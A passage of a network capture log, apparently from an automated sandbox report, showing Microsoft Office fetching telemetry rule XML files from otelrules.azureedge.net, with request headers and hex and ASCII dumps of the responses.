                                                                                        2024-12-05 21:50:55 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        117192.168.2.54992413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:56 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:56 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2284
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                        x-ms-request-id: dea1083a-301e-0051-14cb-4538bb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215056Z-1746fd949bd54zxghC1EWRzre400000003fg00000000u3k1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:56 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        118192.168.2.54992613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:56 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:56 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1393
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                                        x-ms-request-id: 5bdbb5de-801e-0067-47cb-45fe30000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215056Z-1746fd949bdlnsqphC1EWRurw00000000370000000004h7p
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:56 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        119192.168.2.54992713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:56 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:56 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1356
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                        ETag: "0x8DC582BDC681E17"
                                                                                        x-ms-request-id: 55cb7248-101e-0017-4fd4-4547c7000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215056Z-1746fd949bdzd2qvhC1EWRcygw000000032000000000bkwt
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:56 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        120192.168.2.54992813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:56 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:56 UTC495INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1393
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                                        x-ms-request-id: 2e94d759-201e-005d-705f-47afb3000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215056Z-1746fd949bd5gpk5hC1EWR8dk400000000sg0000000039h5
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_MISS
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:56 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        121192.168.2.54992913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:57 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:57 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:57 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1356
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                        ETag: "0x8DC582BDF66E42D"
                                                                                        x-ms-request-id: a7ca5163-201e-0071-37c7-46ff15000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215057Z-1746fd949bdhk6hphC1EWRaw3c000000031g00000000g0rd
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:57 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        122192.168.2.54993213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:58 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:59 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1358
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BE022ECC5"
                                                                                        x-ms-request-id: 6982332e-a01e-0021-2091-46814c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215058Z-1746fd949bdzd2qvhC1EWRcygw000000030g00000000g5nw
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:59 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        123192.168.2.54993313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:58 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:59 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1395
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                        ETag: "0x8DC582BDE12A98D"
                                                                                        x-ms-request-id: 2e27a562-801e-00a0-79cb-452196000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215058Z-1746fd949bdb8xvchC1EWRmbd4000000036000000000q4rs
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:59 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        124192.168.2.54993013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:58 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:59 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1395
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BE017CAD3"
                                                                                        x-ms-request-id: 4ebcc1fc-101e-0028-09cb-458f64000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215058Z-1746fd949bd7wvgbhC1EWR0rgs00000003dg00000000413v
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:59 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        125192.168.2.54993113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:58 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:59 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:58 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1358
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                        ETag: "0x8DC582BE6431446"
                                                                                        x-ms-request-id: 24de3c9e-c01e-00a1-13b3-467e4a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215058Z-1746fd949bddgsvjhC1EWRum2c00000003ng000000003es7
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:59 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        126192.168.2.54993413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:59 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:59 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:59 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1389
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                                        x-ms-request-id: 6b7594f7-701e-001e-76bc-46f5e6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215059Z-1746fd949bdqpttnhC1EWRe1wg00000002z000000000ss0m
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:59 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        127192.168.2.54993513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:01 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
